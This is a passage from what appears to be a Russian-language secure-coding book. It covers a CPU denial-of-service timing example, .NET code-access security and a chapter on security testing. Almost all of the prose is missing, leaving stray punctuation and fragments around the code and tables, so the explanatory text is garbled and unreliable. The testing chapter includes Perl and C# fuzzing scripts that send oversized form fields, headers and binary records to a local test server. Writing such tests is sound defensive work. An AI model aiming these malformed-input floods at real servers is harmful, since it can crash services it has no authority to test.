            foundone = true;
        }
        else
        {
            tmpbuf[written] = *tmp;
            written++;
        }
    }
    if(foundone)
    {
        // strncpy copies exactly 'written' bytes and does not
        // null-terminate, so the terminator is written explicitly.
        // The result is never longer than the input, so it fits in buf.
        strncpy(buf, tmpbuf, written);
        buf[written] = '\0';
    }
    if(tmpbuf != NULL)
        free(tmpbuf);
    return foundone;
}

int main(int argc, char* argv[])
{
    char* input;
    const char* end = "foo";
    DWORD tickcount;
    int i, j;
    // Try inputs of 10, 100, ... 10,000,000 bytes.
    for(i = 10; i < 10000001; i *= 10)
    {
        input = (char*)malloc(i);
        if(input == NULL)
        {
            assert(false);
            break;
        }
        // Fill the buffer with "\\Z" triples and end it with "foo".
        // The loop bound leaves room for "foo\0" after the last triple.
        for(j = 0; j < i - 5; j += 3)
        {
            input[j] = '\\';
            input[j+1] = '\\';
            input[j+2] = 'Z';
        }
        // j now points just past the last triple.
        strncpy(input + j, end, 4);
        tickcount = GetTickCount();
        StripBackslash1(input);
        printf("StripBackslash1: input = %d bytes, time = %lu ms\n",
               i, GetTickCount() - tickcount);
        // Rebuild the input; the first call modified it in place.
        for(j = 0; j < i - 5; j += 3)
        {
            input[j] = '\\';
            input[j+1] = '\\';
            input[j+2] = 'Z';
        }
        strncpy(input + j, end, 4);
        tickcount = GetTickCount();
        StripBackslash2(input);
        printf("StripBackslash2: input = %d bytes, time = %lu ms\n",
               i, GetTickCount() - tickcount);
        free(input);
    }
    return 0;
}
CPU_DoS_Example.cpp
. main
. StripBackslash1
,
:
. StripBackslash2
,
,
. . 171 .
Table 17-1. Timings from CPU_DoS_Example.cpp (GetTickCount differences, ms)
Input length   StripBackslash1   StripBackslash2
10
100
1000
10 000         111
100 000        11 306
1 000 000      2 170 160         20
, ,
10 000 . 1 . ,
36 Pentium III ( 800 ).
,
.
,
StripBackslash2 ,
. ,
.
GetTickCount 0
1 . ,
,
, .
StripBackslash1 StripBackslash2
,
. StripBackslash2 ,
. ,
,
DoS.
. ,
, ,
, DoS.
StripBackslash3.
, , (
) , ,
,
. , ,
, Profiler.
Visual Studio 6 Project
Settings Link. Category
General, Enable Profiling OK.
Profile.
, 1000 ( ,
, ), , :
Program Statistics
slash2.
100 ,
. , 10 , StripBackslash2 StripBackslash1.
100 StripBackslash2 StripBackslash1.
,
, ,
.
,
.
DoS. , ,
, StripBackslash3,
StripBackslash2 StripBackslash3 (. 172).
Table 17-2. Profiler results for StripBackslash2 and StripBackslash3
Input length   StripBackslash2, %   StripBackslash3, %   StripBackslash2 / StripBackslash3
1000           2,5                  1,9                  1,32
10 000         16,7                 14,6                 1,14
100 000        33,6                 23,3                 1,44
1 000 000      46,6                 34,2                 1,36
. , StripBackslash2 .
,
,
.
,
. , .
,
,
. ,
, :
DoS ,
.
Profiler Visual Studio .NET,
Web http://
go.microsoft.com/fwlink/?Linkid=7256.
, ,
Compuware.
,
.
.
new, ,
. :
, InitializeCriticalSection EnterCriticalSection,
Windows XP/.NET Server EnterCriticalSection . :
, .
(David Meltzer) ,
Internet Security Systems. ,
Windows NT 4 Terminal Server Edition
( Microsoft Knowledge Base
http://support.microsoft.com/support/kb/articles/
Q238/6/00.ASP). ,
,
. Terminal Server (
, ),
( )
.
,
, .
,
.
,
. ,
.
. Windows NT
LSA LSA_HANDLE.
,
LSA, .
2048 LSA,
.
LSA ,
. ,
.
, , ;
, .
:
, , ,
.
.
,
. : ,
.
,
.
, ,
;
, .
! ?
.
? ,
Terminal Services
,
. ,
.
. : IPv6
IP, .
IPv4 IPv6
, .
. , ,
.
, ,
. ,
, .
,
, .
SYN (SYN flood) Microsoft:
, , ,
.
Microsoft [ SMB (Server Message Block) NetBIOS]
. ,
.
. , ,
.
, ,
, .
TLS (Transport Level Security),
, 2001 USENIX
Security Conference. Using Client Puzzles to Protect TLS
(Drew Dean) Xerox PARC
,
, ,
, echo chargen
( ). ,
.
. UDP,
TCP. , ,
chargen, echo
?
, echo chargen.
,
,
,
. ,
, chargen echo,
Windows NT 4 Windows,
. ,
, ,
chargen.
chargen echo
( 1024), .
, ,
, UDP 135
Windows NT Windows NT.
RPC (RPC endpoint mapping service).
,
. , ,
.
. ,
.
.
DoS
.
,
. ,
,
,
. , ,
,
, , ICMP (Internet Control Message Protocol) UDP.
,
, .
DoS,
.
.
, ,
,
DoS
.
. ,
.
.
,
. ,
, ,
.
18
.NET
. Microsoft
Professional Developers Conference ( 2001 .),
, ,
.NET Framework .
, SQL,
C++ C#, , .
(
C C++) ,
,
. ,
.NET.
? , Microsoft
.NET, ,
,
. ,
, ,
CLR (Common Language Runtime), Web XML.
,
, , :
(web.config);
, System.Security.Cryptography;
, .
CLR .NET ,
,
, ActiveX.
Microsoft Windows
. ,
,
, .
(restricted token) Windows 2000
( 7).
.NET :
,
(
) ,
.
, ,
. , (
,
) ,
, .
Web:
Web (, )
, . .NET
. ,
, Web.
,
, ,
.NET,
. ,
, .
.
: . !
.NET ,
.
! CLR , ,
.
, .
,
(Code Access Security, CAS) .NET.
,
.NET CLR. , ,
. ,
, .NET Framework Security (.
).
, CAS
: . :
, ,
(. 181).
,
?
. 181.
,
?
: ,
,
.
. , (. 182).
,
,
. 182. , ,
,
, CAS!
CAS. . 183.
,
?
,
,
. 183.
CAS
,
, ,
, . . 184,
CAS.
Assert()
Deny()
PermitOnly()
, ,
,
1990
. 184.
, CAS,
, .
: FxCop
, FxCop (
http://www.gotdotnet.com),
. FxCop ,
<?xml version="1.0"?>
:
. 185.
FxCop
, FxCop
.
.
.
excel.exe, ? . ,
, ,
, Microsoft Excel. ,
Microsoft Excel? .NET
,
, ,
.
,
sn.exe. :
sn -k keypair.snk
keypair.snk ,
. (
; ,
.)
,
, .
, ,
, Authenticode. ,
, .
, .
, , ,
.
, ,
,
, , ,
.
Authenticode, .
, Authenticode.
, Authenticode
, , .
! ,
,
.
,
.
1024
RSA.
:
sn -p keypair.snk public.snk
, .
, ,
:
[assembly: AssemblyKeyFile(<____>)]
Visual Studio .NET
AssemblyInfo.cs AssemblyInfo.vb. Visual Basic .NET :
Imports System.Reflection
<Assembly: AssemblyKeyFileAttribute("c:\keys\keypair.snk")>
,
.
, ,
, . ,
:
sn -R <_>.dll keypair.snk
, .
:
sn -Vr <_>.dll
! ,
.
, Visual Basic .NET
:
<Assembly: AssemblyDelaySignAttribute(true)>
C# :
[assembly: AssemblyDelaySign(true)]
,
.
ASP.NET
, Web,
(global assembly cache, GAC)
.NET Configuration (Mscorcfg.msc) gacutil.exe.
ASP.NET.
, CLR .NET
, .
,
. Demand, CLR , ,
. .
(stack walk).
, ,
,
, .
?
.NET.
, ,
, , ,
.
.
,
, .
,
.
, .
, ,
.
, .
, FileIOPermission
, :
[assembly: FileIOPermission(SecurityAction.RequestMinimum,
Read = @"c:\files\inventory.xml")]
.
RequestMinimum.
, PolicyException .
,
, ,
. ,
,
:
, , ,
( ),
.
CLR
, , ,
.
.
,
FileIOPermission.
,
. :
, , ,
C# Visual Basic .NET .
(declarative permissions).
.
(imperative permissions)
.
, :
new FileIOPermission(FileIOPermissionAccess.Read,
@"c:\files\inventory.xml").Demand();
,
XML.
,
.
.
.
Permissions View (permview);
/decl.
,
.
,
.
Assert
Assert CLR
, ,
. Assert, : ,
. ,
.
! CLR CodeAccessPermission.Assert
assert C C++ Debug.Assert
.NET Framework.
, .
,
, / . ,
,
.
, : ,
. Assert ,
. ,
USB, UsbFileStream FileStream.
, USB API Win32, ,
, / (FileIOPermission).
UsbFileStream UnmanagedCode ( Win32
API) FileIOPermission, ,
/.
, (
, ) , .
, ../../boot.ini?
? , ,
(ACL) ,
FAT.
Assert, , , Assert
Demand Demand, . ,
.
,
.
! ,
SecurityPermissionFlag.UnmanagedCode;
.
Demand Assert
Demand Assert
.
, ,
, . :
,
, SecurityPermissionFlag.Assertion.
.
, FileIOPermission,
, .
FileIOPermission, ,
.
, Demand
.
EmailAlertPermission,
. ,
.
! ,
Demand, . ,
Main ,
, .
,
Demand
*, SecurityManager.IsGranted,
. . .
, (
).
Main,
! ,
,
.
!
, .
. , EnvironmentPermission Environment.GetEnvironmentVariable,
.NET Framework .
, .
,
, ,
EmailAlertPermission (
), , SMTP,
SocketPermission.
,
, SocketPermission.
UnmanagedCode
.
,
, ,
.
UnmanagedCode? .
, .
:
.
FileIOPermission .
:
, , .
.
SecurityPermission. :
[SecurityPermission(SecurityAction.Assert,UnmanagedCode=true)]
Assert .
, ,
, :
try {
    PermissionSet ps =
        new PermissionSet(PermissionState.Unrestricted);
    ps.AddPermission(new FileDialogPermission
        (FileDialogPermissionAccess.Open));
    ps.AddPermission(new FileIOPermission
        (FileIOPermissionAccess.Read, @"c:\files"));
    ps.Assert();
} catch (SecurityException e) {
    // The assert failed; handle the error here.
}
, ,
CodeAccessPermission. RevertAssert, ,
Assert.
; , ,
.
C# , ,
.
,
SMTP,
.
using System;
using System.Net;
using System.Security;
using System.Security.Permissions;

// EmailAlertPermission is the custom permission introduced in the text;
// SendAlertTo is the helper that actually talks to the mail server.
static void SendAlert(string alert) {
    // Demand the custom permission from every caller on the stack
    // before doing anything else.
    new EmailAlertPermission(
        EmailAlertPermission.Send).Demand();
    // Assert the socket permission so that callers need not hold it
    // themselves, restricted to the one SMTP host and port.
    NetworkAccess na = NetworkAccess.Connect;
    TransportType type = TransportType.Tcp;
    string host = "mail.northwindtraders.com";
    int port = 25;
    new SocketPermission(na, type, host, port).Assert();
    try {
        SendAlertTo(host, port, alert);
    } finally {
        // Remove the assert as soon as the privileged work is done.
        CodeAccessPermission.RevertAssert();
    }
}
Assert, Deny PermitOnly ,
Deny, Assert
PermitOnly.
, A() B(),
C(), A() ReflectionPermission.
C() ReflectionPermission , ,
, . ? , ,
Assert,
A(). , .
Demand LinkDemand
,
. .NET Framework
, ,
, . ,
System.IO.File FileIOPermission
. FileIOPermission File,
.
,
.
LinkDemand JIT
(justintime)
. ,
.
LinkDemand ,
(luring attack),
. LinkDemand ,
,
. .
- LinkDemand
. .
[PasswordPermission(SecurityAction.LinkDemand, Unrestricted=true)]
[RegistryPermissionAttribute(SecurityAction.PermitOnly,
Read=@"HKEY_LOCAL_MACHINE\SOFTWARE\AccountingApplication")]
public string returnPassword() {
return (string)Registry
.LocalMachine
.OpenSubKey(@"SOFTWARE\AccountingApplication\")
.GetValue("Password");
}
...
public string returnPasswordWrapper() {
return returnPassword();
}
, , ,
, ,
. returnPassword,
PasswordPermission. returnPassword,
,
. returnPasswordWrapper
LinkDemand returnPasswordWrapper
returnPassword
returnPassword, . ! ,
returnPasswordWrapper, .
LinkDemand JIT
,
, .
: LinkDemand
. ,
. ,
LinkDemand,
, ,
.
, , LinkDemand
? ,
LinkDemand , ,
.
! LinkDemand
(reflection) (
, ,
)
.
,
.
LinkDemand
,
Demand.
,
, .
SuppressUnmanagedCodeSecurityAttribute:
,
.
SuppressUnmanagedCodeSecurityAttribute , ,
. Demand LinkDemand,
.
,
Win32, .
MyWin32Function SuppressUnmanagedCodeSecurityAttribute.
using System.Security;
using System.Runtime.InteropServices;
...
public class MyClass {
    ...
    // The attribute removes the UnmanagedCode demand that every
    // P/Invoke call would otherwise trigger on its callers.
    [SuppressUnmanagedCodeSecurityAttribute()]
    [DllImport("MyDLL.DLL")]
    private static extern int MyWin32Function(int i);
    public int DoWork() {
        return MyWin32Function(0x42);
    }
}
, .
! , , , LinkDemand SuppressUnmanagedCode
SecurityAttribute :
.
, ,
.
SuppressUnmanagedCodeSecurity,
: , ,
(private) (internal)
.
, ( ,
MarshalByRefObject) ,
, , Demand, LinkDemand InheritanceDemand, .
, ,
SOAP, Web.
. ,
.
, , ,
.
, , ,
.
; ,
. ,
, ; , ,
. :
protected, .
, ,
, , , C++.
(sealed) ( Visual Basic
NotInheritable), , .
.
. :
, .
.
,
.
. InheritanceDemand
, ,
,
. , ,
, EnvironmentPermission:
[EnvironmentPermission
(SecurityAction.InheritanceDemand, Unrestricted=true)]
public class Carol {
...
}
class Brian : Carol {
...
}
Brian Carol ,
EnvironmentPermission.
:
,
. , PrivateKeyPermission ,
SetKey:
[PrivateKeyPermission
(SecurityAction.InheritanceDemand, Unrestricted=true)]
public virtual void SetKey(byte [] key) {
m_key = key;
DestroyKey(key);
}
, :
[StrongNameIdentityPermission(SecurityAction.LinkDemand,
PublicKey="00240fd981762bd0000...172252f490edf20012b6")]
.
SiteLock ActiveX, 16.
, , :
. ,
, Web
. ! ,
(cross-site scripting)!
// , explorationair.com
}
}
XML-
, .
, web.config, ,
, . ,
, .
.
, XCOPY (
), .
ASP.NET 1.1 Data Protection API
, . ( DPAPI
9.) <processModel>, <identity>
<sessionState>. ,
, .
ASP.NET
aspnet_setreg. ,
ASP.NET:
<system.web>
<processModel
enable="true"
userName="registry:HKLM\Software\SomeKey,userName"
password="registry:HKLM\Software\SomeKey,passWord"
...
/>
</system.web>
CryptProtectData .
,
,
,
.
,
ASP.NET .
,
, .NET
AllowPartiallyTrustedCallersAttribute. ,
, ,
. ,
,
,
.
CLR .NET
Framework, ,
, .
. ,
. .
,
,
, AllowPartiallyTrustedCallersAttribute ,
:
[Assembly:AllowPartiallyTrustedCallers]
, ,
,
.
! ,
.
, ,
,
,
AllowPartiallyTrustedCallersAttribute.
, ,
.
1. A AllowPartiallyTrustedCallersAttribute.
2. B ,
.
3. B A, A
.
! AllowPartiallyTrustedCallersAttribute
.
,
, ,
, ,
. SuppressUnmanagedCodeSecurityAttribute,
, :
.
C/C++
.NET Framework . ,
, ,
. , :
. ,
. , AppA, ; AppB
AppA AddHandler. ,
, , ,
System.Environment.Exit. AppA
.
.
,
:
new EnvironmentPermission(
EnvironmentPermissionAccess.Read,"USERNAME").PermitOnly();
, PermitOnly ( ,
), , .
.
, ISerializable,
.
?
using System;
using System.Runtime.Serialization;

[Serializable()]
public class Password: ISerializable {
    private String sensitiveStuff;
    public Password() {
        sensitiveStuff = GetRandomKey();
    }
    // Deserialization constructor: rebuilds the object from the stream.
    public Password (SerializationInfo info, StreamingContext context) {
        sensitiveStuff =
            (String)info.GetValue("sensitiveStuff", typeof(string));
    }
    // Serialization: writes the secret out to the stream.
    public void GetObjectData
        (SerializationInfo info, StreamingContext context) {
        info.AddValue("sensitiveStuff", sensitiveStuff);
    }
}
, sensitiveStuff,
( , !).
, :
[SecurityPermissionAttribute(SecurityAction.Demand,
SerializationFormatter=true)]
, /. ,
, . ,
, , ,
. C# , .
using System.IO.IsolatedStorage;
...
IsolatedStorageFile isoFile =
    IsolatedStorageFile.GetStore(
        IsolatedStorageScope.User | IsolatedStorageScope.Assembly,
        null, null);
,
,
: ,
,
, , .
Visual Basic.NET , .
Imports System.IO.IsolatedStorage
...
Dim isoStore As IsolatedStorageFile
isoStore = IsolatedStorageFile.GetStore( _
IsolatedStorageScope.User Or _
IsolatedStorageScope.Assembly Or _
IsolatedStorageScope.Domain, _
Nothing, Nothing)
,
, IsolatedStorageScope.Roaming.
Microsoft Windows
( Windows NT/2000
Windows 98),
.
IsolatedStorageFile.GetUserStoreForAssembly IsolatedStorageFile.GetUserStoreForDomain;
.
, ,
FileStream , FileIOPermission.
, , ,
,
.
XSLT !
XSLT (XSL Transformation) .NET
Framework,
System.Xml.Xsl. , XSLT ,
. XSLT
, ,
,
, XML.
ASP.NET
, , ,
. :
.
.
DEBUG IIS (Internet Information Services)
(. 186).
. 186. DEBUG
(), ,
SOAP
ASP.NET,
:
<customErrors> ASP.NET
remoteOnly,
.
,
. remoteOnly (
) On. Off ,
.
<configuration>
  <system.web>
    <customErrors
        defaultRedirect="error.htm"
        mode="RemoteOnly">
      <error statusCode="404"
             redirect="404.htm"/>
    </customErrors>
  </system.web>
</configuration>
.
, ,
.NET. CLR System.Runtime.Serialization
(serializing).
, ,
,
.
,
SerializationFormatter. ,
.
,
, .NET. , MFC
CArchive::<> >> CArchive::<> <<. MFC
, ,
.
.NET
.
. :
try {
    // Privileged work goes here.
} catch (Exception e) {
    // Echoing the whole exception leaks internal details to the caller.
    Result.WriteLine(e.ToString());
}
:
, .
Windows, .
using System;
using System.Diagnostics;
using System.Security.Permissions;
...
try {
    // Privileged work goes here.
} catch (Exception e) {
#if (DEBUG)
    Result.WriteLine(e.ToString());
#else
    Result.WriteLine("An error occurred.");
    new LogException().Write(e.ToString());
#endif
}

public class LogException {
    public void Write(string e) {
        try {
            new EventLogPermission(
                EventLogPermissionAccess.Instrument,
                "machinename").Assert();
            EventLog log = new EventLog("Application");
            log.Source = "MyApp";
            log.WriteEntry(e, EventLogEntryType.Warning);
        } catch(Exception e2) {
            // Logging itself failed; nothing more can be done here.
        }
    }
}
EventLogPermission().Assert,
. , ,
, .
Microsoft .NET
http://msdn.microsoft.com. Security Concerns for
Visual Basic .NET and Visual C# .NET Programmers (
Visual Basic .NET Visual C# .NET) (http://msdn.microsoft.com/
library/enus/dv_vstechart/html/vbtchsecurityconcernsforvisualbasicnetprogrammers.asp)
.
I V
19
, ,
, ,
,
! ,
,
, . ;
.
,
.
, .
, ,
, .
, Microsoft Windows, Linux,
UNIX MacOS.
. .
; ,
.
, , ,
.
, ,
,
. , ,
:
.
,
. ,
,
.
,
, ,
.
, ,
, . :
,
.
,
. ,
.
, , , .
!
, .
! ,
. ,
!
, ,
.
, .
,
. :
, ,
, ,
,
,
. ,
, . ,
. :
, ,
.
,
, .
, 2!
.
: ,
!, : ,
! .
,
.
,
, . , ,
, !
!
:
. ,
, ,
. .
http://www.securityfocus.com,
, .
-
,
,
. ,
, .
1. .
2. .
3. .
4. , .
5. , () .
:
,
,
,
. ,
.
,
. . ,
,
. ,
: , ,
(STRIDE), (DREAD
). .
, .
, , . ,
. , ,
?
,
,
. ,
.
.
. ,
, .
:
TCP UDP;
, ;
NetBIOS;
;
(Dynamic Data Exchange, DDE);
;
;
(
), ;
;
(local procedure call, LPC) (remote procedure call, RPC) ;
, COM;
ActiveX ( <OBJECT>);
EXE DLL;
/ ,
;
;
HTTP;
SOAP (Simple Object Access Protocol);
RAPI (Remote API), ;
;
;
;
, OLE DB ODBC;
;
(store-and-forward), ,
SMTP, POP MAPI
, MSMQ;
( );
;
;
LDAP, Active Directory;
, (IrDA), USB, COM
, FireWire (IEEE 1394), Bluetooth .
,
.
,
.
. (. 191) ,
. ,
: .
19-1.
, ,
, SYSTEM ( Microsoft Windows NT
) root ( UNIX Linux)
,
C C++, VB, C#, Perl .
C C++
2
1
1
2
1
, , ,
,
.
!
,
. . 192
. ,
.
19-2.
, RPC, , NetBIOS
Active Directory
HTTP
HTTP, ,
, MIME,
XML,
SOAP
COM
argv[]
C C++, ,
WScript. Windows
WSH String[] args
C#
, ,
,
(test case).
, STRIDE.
STRIDE
, STRIDE,
,
.
. . 410 ( 4)
.
.
. 193 , ,
,
. ,
( !).
. 193 ,
.
, , ,
, , DLL.
.
19-3.
(spoofing identity)
:
, ,
?
.
?
(,
cookie) , ?
:
,
?
(tampering with data)
.
,
?
, MAC ,
.
,
,
, SSL/TLS IPSec
(repudiation)
,
?
,
? ,
,
.
? (.
.)
.
(Information disclosure)
(, .) .
(sniffer)
.
.
,
.
,
.
, .
DoS !
(DoS)
,
.
?
,
.
(,
,
) ?
,
(Elevation of privilege)
,
.
?
,
?
!
, .
! ,
,
.
, STRIDE,
. .
. (data mutation) , ,
, , .
,
, , , ,
, .
,
DoS.
, , DoS,
.
DoS.
! DoS,
.
,
,
.
. 191 ,
.
(Cv)
(Cr)
Null (Cn)
(Ct)
(Cps)
(Cz)
(Cs)
(Nr)
(Cpm)
(Cpe)
(Co)
(Cps)
(No)
(Nh)
HTML (Cph)
(Cpq)
(Ol)
(Oa)
(Ll)
(Or)
(On)
(Od)
(Oe)
(Lz)
(Ls)
. 191.
, .
.
, DoS. ,
,
. ,
,
,
.
, .
(
) ( ).
( ) ,
. , , ,
, . , , ,
!
.
(Oa); ,
(ACE). (Or)
. ,
, ACE .
, , . Windows
, .
, ,
(Oe) (Od). ,
. , ?
?
, , ,
? ( UNIX) .
, ,
? 11,
.
(. 191). ,
, . ,
Config.xml, ,
( . 191 Ll), Myreallybigconfig.xml,
( . 191 Ls) , C.xml,? ,
(Cr), RfQy6J.87d?
, :
.
, . ,
, , .
.
, .
(Cr) ,
,
. ,
, , ,
, . ,
.
, ,
Perl.
# Builds a 256-character string of random printable characters.
# srand/rand are not cryptographic; this is only for test input.
srand time;
my $size = 256;
my @chars = ('A'..'Z', 'a'..'z', 0..9, qw( ! @ # $ % ^ & * - + = ));
my $junk = join ("", @chars[ map { rand @chars } (1 .. $size) ]);
C C++ CryptGenRandom,
( ,
, 8). CryptGenRandom (. Secureco2\Chapter19\PrintableRand).
/*
   PrintableRand.cpp
*/
#include "windows.h"
#include "wincrypt.h"
#pragma comment(lib, "advapi32.lib")

// Fills lpBuff with cbBuff bytes of cryptographically random data.
// When fPrintable is TRUE the bytes are mapped onto printable ASCII and
// the buffer is null-terminated. Returns 0 on success, else a Win32 error.
DWORD CreateRandomData(LPBYTE lpBuff, DWORD cbBuff, BOOL fPrintable) {
    DWORD dwErr = 0;
    HCRYPTPROV hProv = NULL;
    if (CryptAcquireContext(&hProv, NULL, NULL,
                            PROV_RSA_FULL,
                            CRYPT_VERIFYCONTEXT) == FALSE)
        return GetLastError();
    ZeroMemory(lpBuff, cbBuff);
    if (CryptGenRandom(hProv, cbBuff, lpBuff)) {
        if (fPrintable) {
            char *szValid = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                            "abcdefghijklmnopqrstuvwxyz"
                            "0123456789"
                            "~`!@#$%^&*()_-+={}[];:'<>,.?|\\/";
            DWORD cbValid = lstrlenA(szValid);
            // Map each random byte (0-255) onto the printable set.
            // The modulo reduction is slightly biased, which is acceptable
            // for test data; strlen(szValid) is well below 255.
            for (DWORD i = 0; i < cbBuff; i++)
                lpBuff[i] = szValid[lpBuff[i] % cbValid];
            // Null-terminate: the buffer then holds cbBuff-1 random characters.
            lpBuff[cbBuff - 1] = '\0';
        }
    } else {
        dwErr = GetLastError();
    }
    if (hProv != NULL)
        CryptReleaseContext(hProv, 0);
    return dwErr;
}

int main(void) {
    BYTE bBuff[16];
    if (CreateRandomData(bBuff, sizeof bBuff, FALSE) == 0) {
        // Success: bBuff holds 16 random bytes.
    }
    return 0;
}
,
,
. : ,
.
. Perl ,
.
# Sends strings whose length doubles each round,
# from 1 character up to $MAX.
# Perl allows '_' as a digit separator: 128_000 is 128 000.
my $MAX = 128_000;
for (my $i = 1; $i < $MAX; $i *= 2) {
    my $junk = 'A' x $i;
    # Send $junk to the application under test here.
}
! ,
. ,
, .
(Barton P. Miller) Fuzz Revisited: A Reexamination of the Reliability
, ,
, .
:
(Cs);
(Ct);
Null (Cn);
(Cz);
(Co);
(Cv).
(Cs) (Ct) .
, 0 0. [
. 0, , 0,
, (Ct).] Null , ;
.
.
: 09
092002, 09092002Jk17&61hhAn=_9jAMh.
.
,
, . , Web
, () , TIMESTAMP,
, ,
.
TIMESTAMP,
.
:
UNIX. . .
, ,
. , :
TIMESTAMP:
H7ahbsk (0kaaR
(
) , ,
:
TIMESTAMP:
09871662
RPC,
/robust MIDL (Microsoft Interface Definition Language).
RPC,
.
. RPC
,
, MIDL.
MIDL /robust
. , RPC
,
. RPC .
.
: , 1777,
, C++ :
struct {
    short actAction;     // 2 bytes: ACTION_QUERY, ACTION_GET_LAST_TIME or ACTION_SYNC
    short cbBlobSize;    // 2 bytes
    char  bBlob[128];    // 128 bytes
};
, actAction 0, 1 2,
ACTION_QUERY, ACTION_GET_LAST_TIME
ACTION_SYNC, ,
, 132
. ,
actAction
, cbBlobSize bBlob . Perl
(. Secureco\Chapter19).
# PackedStructure.pl
# Opens a TCP connection to the test server listening on port 1777,
# packs the three fields of the structure into one binary record
# and sends it; the blob is MAX_BLOB bytes of 'A'.
use IO::Socket;
my $MAX_BLOB = 128;
my $actAction = 0;   # ACTION_QUERY
my $bBlob = 'A' x $MAX_BLOB;
my $cbBlobSize = 128;
my $server = '127.0.0.1';
my $port = 1777;
if (my $socks = IO::Socket::INET->new(Proto    => "tcp",
                                      PeerAddr => $server,
                                      PeerPort => $port,
                                      Timeout  => 5)) {
    my $junk = pack "ssa128", $actAction, $cbBlobSize, $bBlob;
    printf "Sending to port $port (%d bytes)\n", length $junk;
    $socks->send($junk);
}
Perl
ActiveState Visual Perl 1.0 http://www.activestate.com.
pack. Perl
,
. ssa128,
( s) 128
(a128). pack ,
Unicode UTF8, (little endian) (big endian)
. .
pack Perl
,
.
,
XML (. 192 193).
, . ,
.
(Ll).
, ,
.
(Cl:Ll)
(Ol)
(Oa)
(Oa)
(Cs Co)
(Cl:Lz)
OnHand.xml
(Cl:Lz)
(Cr)
</items>
(Cpe)
(Cr)
. 192. XML,
OnHand.xml
(Cl:Lz)
(Cr)
. 193.
(Cl:Lz)
(Cr)
(Cl:Ll)
(Cl:Ll)
(Cl:Lz)
(Cp)
(Co)
</items>
, (Cw)
(Co)
(Co)
(Co)
(Cl:Ll)
, (Cv)
XML
Perl : ,
.
; ,
, , .
, ? (,
20.) :
my $cbBlobSize = 256;
# .
256 .
128 , MAX_BLOB
(128) .
256 128 , 256
. 256
256 . , ,
, 128 .
, , ,
. ,
, , DoS.
my $cbBlobSize = 256_000;
# .
,
.
, .
: +
, ,
,
.
,
. :
.
15 .
, EIP.
( A),
, , ,
.
EIP
A B, ,
B, .
B
EIP, .
EIP , .
, ,
MAX_PATH,
. MAX_PATH
Windows 260.
, Unicode ANSI
, ANSI
, Unicode, .
, ,
, [ , (Cpq)
(Cpm)]
[, (Cpe)].
. 194.
19-4.
// /* */
C++, C# C
Perl
Visual Basic
<! >
HTML XML
SQL
;:
\n \r 0x0a 0x0d
\t
0x04
0x7f
0x00
<>
*?
, :
(Nr), (No)
(Nh).
. ( )
, ,
, . ,
cookie
, ,
, , (replay) ,
,
.
. , Data1, Data2 Data3,
: Data1, Data3
Data2. ,
Data1, Data2 Data3 .
.
:
.
.
Perl ,
, C/C++, .NET
.
?
,
, !
: ,
.
. 17
, .
, ,
Hailstorm Cenzic.
,
(flooding) .
http:// www.cenzic.com.
.
, .
Performance Monitor ()
.
, ,
.
, Gflags.exe (
Windows 2000 Windows .NET)
, ; Oh.exe
; dh.exe
.
Windows 2000 Windows .NET.
! ,
. ?
,
. ,
.
, .
.
.
.
: , , ,
. , ,
,
. , Visual Basic
COM,
.
.
exploit, . ,
,
, .
:
. Sendmail,
(pipe bomb),
AIX 10.0 IBM,
.
,
, ,
!
.
. ,
, ,
. . ,
,
.
Perl,
. Perl
,
pack. ,
C++,
C++.
,
HTTP-
Perl .NET Framework. :
, HTTP .
Perl C#, ,
, HTTP.
Perl (. Secureco2\Chapter19), HTTP
. Name, Address Zip
. Timestamp,
.
# SmackPOST.pl
use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;
# Set the user agent.
my $ua = LWP::UserAgent->new();
$ua->agent("HackZilla/v42.42 WindowsXP");
# Build the POST request with oversized form fields.
my $url = "http://127.0.0.1/form.asp";
my $req = POST $url, [Name    => 'A' x 128,
                      Address => 'B' x 256,
                      Zip     => 'C' x 128];
$req->push_header("Timestamp" => '1' x 10);
my $res = $ua->request($req);
# Check the result.
# $err holds the HTTP status line,
# $_ holds the whole HTTP response.
my $err = $res->status_line;
$_ = $res->as_string;
print "Possible bug found: $err\n" if (/Illegal Operation/i || $res->code != 200);
, ,
Perl, LWP
WWW Perl (Library for WWW) HTTP,
.
(. Secureco2\Chapter19).
ISAPI test.dll, GET.
URL
(bogushdr), , H
256 , + ,
, 128 .
# SmackQueryString.pl
use LWP::UserAgent;
use HTTP::Headers;
use HTTP::Request;
use URI::URL;
# A 256-byte header value followed by a line break, repeated 128 times.
$bogushdr = ('H' x 256) . "\n\r";
$hdr = new HTTP::Headers(Accept        => 'text/plain',
                         'User-Agent'  => 'HackZilla/42.42',
                         'Test-Header' => $bogushdr x 128);
$urlbase = 'http://localhost/test.dll?data=';
$data = 'A' x 16_384;
$url = new URI::URL($urlbase . $data);
$req = new HTTP::Request(GET, $url, $hdr);
$ua = new LWP::UserAgent;
$resp = $ua->request($req);
if ($resp->is_success) {
    print $resp->content;
}
else {
    print $resp->message;
}
.NET Framework
WebClient, HttpGetClientProtocol HttpPostClientProtocol.
HTTP::Request::Common Perl,
. C# ,
WebClient ,
.
using System;
using System.Net;
using System.Text;
namespace NastyWebClient {
    class NastyWebClientClass {
        static void Main(string[] args) {
            if (args.Length < 1) return;
            string uri = args[0];
            WebClient client = new WebClient();
            client.Credentials = CredentialCache.DefaultCredentials;
            // An oversized custom header and a custom user agent.
            client.Headers.Add
                (@"IWonderIfThisWillCrash:" + new String('a', 32000));
            client.Headers.Add
                (@"User-agent: HackZilla/v42.42 WindowsXP");
            try {
                // The rest of this sample is missing from the page;
                // the request is issued here so that the block compiles.
                byte[] data = client.DownloadData(uri);
                Console.WriteLine(Encoding.ASCII.GetString(data));
            } catch (WebException e) {
                Console.WriteLine(e.Message);
            }
        }
    }
}
Perl Win32::Pipe, ,
, C++
. C++,
ACL .
.
.
Testing RPC and DCOM servers

RPC and DCOM interfaces are described in IDL (Interface Definition Language). Compile the IDL with the /robust switch (see Chapter 16) so that the RPC run time checks incoming data more strictly before it reaches your code; this protects RPC servers and DCOM servers alike, since DCOM is built on RPC. To test an RPC server, build a client in C++ from the same IDL and call each method with the classes of malformed data listed in Table 19-1; the client can be a simple loop that varies one parameter at a time. DCOM servers, including those written in C++, are tested the same way, and Automation objects that expose IDispatch can be driven from a script as well as from C++.
Testing ActiveX controls

